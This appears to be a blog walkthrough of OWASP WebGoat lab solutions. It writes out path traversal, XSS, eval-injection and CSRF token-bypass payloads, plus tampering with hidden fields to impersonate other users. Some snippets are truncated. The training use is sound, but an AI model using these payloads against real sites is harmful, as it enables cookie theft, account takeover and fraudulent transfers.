Access Control flaws**************************************************
1. Bypass a Path Based Access Control Scheme
../../../../../../../etc/tomcat6/tomcat-users.xml
The number of ../ segments must match the depth of the current directory so that the path resolves up to the root directory.
AJAX security*********************************************************
1. Lab: DOM-Based Cross-Site Scripting
Step 1
</img>
Submit
Step 2
</img> onMouseOver ...
<a onclick="javascript:alert(/xss/)">haha</a>
onmouseover / onmouseout ...
<a onclick="javascript:eval(document.location.href='http://www.baidu.com')">haha</a>
Step 3
<iframe src="javascript:alert(/xss/)"></iframe>
Step 4
Please enter your password:<br><input type="password" id="passwd"><br><button onclick="javascript:alert('I have your password: ' + pass.value);">Submit</button>
This passes the lesson, but pass.value throws an error, because the input's id is passwd rather than pass.
Step 5
Edit /owaspbwa/webgoat-svn/target/webgoat-5.4+svn/javascript/domxss.js so that the name is passed through the escapeHTML function:
function displayGreeting(name) {
  if (name != '') {
    document.getElementById("greeting").innerHTML = "Hello, " + escapeHTML(name) + "!";
  }
}
After encoding, it becomes:
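An added example, not the lesson's own domxss.js, showing what the escaping helper in Step 5 has to do: every character that can open markup or break out of an attribute is replaced before the string reaches innerHTML. The element is passed in as a parameter (an assumption for running it outside a browser) instead of being looked up with getElementById.

```javascript
// Added example (not WebGoat's code): HTML-escape untrusted input before it
// is concatenated into markup, as the Step 5 fix does with escapeHTML(name).
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#x27;",
};

// Replace the five characters that matter inside HTML text and attribute values.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Builds the greeting markup; `name` comes from the query string in the lesson,
// so it is attacker-controlled and must be escaped.
function buildGreeting(name) {
  if (name === "") {
    return "";
  }
  return "Hello, " + escapeHtml(name) + "!";
}

// Same shape as the lesson's displayGreeting, but the target element is a
// parameter (assumed, so the function runs without a DOM) and the assigned
// markup is returned for inspection.
function displayGreeting(name, element) {
  element.innerHTML = buildGreeting(name);
  return element.innerHTML;
}
```

With the Step 3 payload as input, the greeting now contains the literal text &lt;script&gt;... instead of a script element.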
2. Lab: Client Side Filtering
Step 1
By intercepting the AJAX response with WebScarab, you can see the data of all 12 employees.
3. XML Injection
4. JSON Injection
Intercept the XML or JSON response with WebScarab and modify it directly.
5. Silent Transactions Attacks
Reading the page's script shows that the AJAX transfer is performed by the submitData(accountNo, balance) function, which can be called directly to transfer money. Enter in the browser address bar:
javascript:submitData(666,10000)
6. Dangerous use of Eval
123"'); alert(document.cookie);//
The code that gets evaluated then becomes:
alert('whoops: you entered an incorrect access code of "123"'); alert(document.cookie);//"');
7. Insecure Client Storage
Step 1
Debug clientSideValidation.js with Firebug, set a breakpoint on line 42 (return caesar), and keep resuming to reveal all the coupon codes:
Platinum, Gold, Pressone, Presstwo
Enter any one of them to pass.
Step 2
Intercept the AJAX response with WebScarab and change the returned value to 0 to complete the lesson.
Authentication flaws*************************************************************
1. Basic Authentication
Step 1
Look at the request header to find it.
Step 2
1. Use WebScarab to remove the authentication header and the cookie (both must be deleted).
2. Log in with basic:basic in the login box that is returned.
3. Delete the value of the cookie at this point, so that a brand-new WebGoat session is returned.
4. Choose this lesson to pass.
2. Multi Level Login 2
Log in as Joe/banana and enter the requested TAN to query your information. At that point, use WebScarab to change the value of hidden_user in the sent request to Jane.
3. Multi Level Login 1
Same as above, but modify the value of hidden_tan.
Buffer overflows********************************************************************
1. Off-by-One Overflows
Use Burp Suite to perform the injection.
Code quality*************************************************************************
1. Discover Clues in the HTML
View the HTML source and search for <! to find:
<!-- fixme ADMIN:ADMINPW --><!-- use admin to regenerate database -->
Cross-site Scripting (XSS) ***********************************************************
1. Phishing with XSS
Construct a form:
</form><br><br><br>
Through the proxy you can see that a request to http://xx.xx.xx.xx/webgoat/Catcher?Property=yes&user=xx&password=xx&submit=login is actually sent to the server, even though the requested resource does not exist.
2. Lab: Cross Site Scripting
Step 1
Edit Tom's profile and change the street field to <script>alert(/xss/)</script>, then log in as Jerry and view Tom's profile to complete the lesson. Other fields can be modified instead.
Step 3
3. Stored XSS Attacks
Enter <script>alert(/xss/)</script> in the message box.
4. Reflected XSS Attacks
Observe that UpdateCart submits all data with POST, but the values of "Enter your credit card number:" and "Enter your three digit access code:" are echoed back exactly as posted, so JavaScript can be inserted here:
<script>alert(/xss/)</script>
5. Cross Site Request Forgery (CSRF)
Same as stored XSS.
6. CSRF Prompt By-Pass
7. CSRF Token By-Pass
a. Open the Funds Transfer page by adding the parameter transferFunds=main to the URL.
b. View the page source and find: <input type="hidden" value="-953910496" name="CSRFToken">
c. Construct the payload. The key is to first open the transfer page with transferFunds=main in order to obtain that page's CSRFToken, then use it in the transfer request.
<script>
var tokenvalue;
function readFrame1() {
  var framedoc = document.getElementById("frame1").contentDocument;
  var form = framedoc.getElementsByTagName("form")[1];
  var token = form.CSRFToken.value;
  tokenvalue = '&CSRFToken=' + token;
  loadFrame2();
}
function loadFrame2() {
  var testframe = document.getElementById("frame2");
  testframe.src = "http://xx.xx.xx.xx/WebGoat/attack?Screen=838&menu=900&transferFunds=4000" + tokenvalue;
}
</script>
<iframe src="http://xx.xx.xx.xx/WebGoat/attack?Screen=838&menu=900&transferFunds=main" onload="readFrame1();" id="frame1" frameborder="1" marginwidth="0" marginheight="0" width="1" scrolling="yes" height="1"></iframe>
<iframe id="frame2" frameborder="1" marginwidth="0" marginheight="0" width="1" scrolling="yes" height="1"></iframe>
This article is from the "Technology No Peak" blog; please keep this source: http://shelia.blog.51cto.com/2930476/1626479
WebGoat Topic Solution (General~XSS)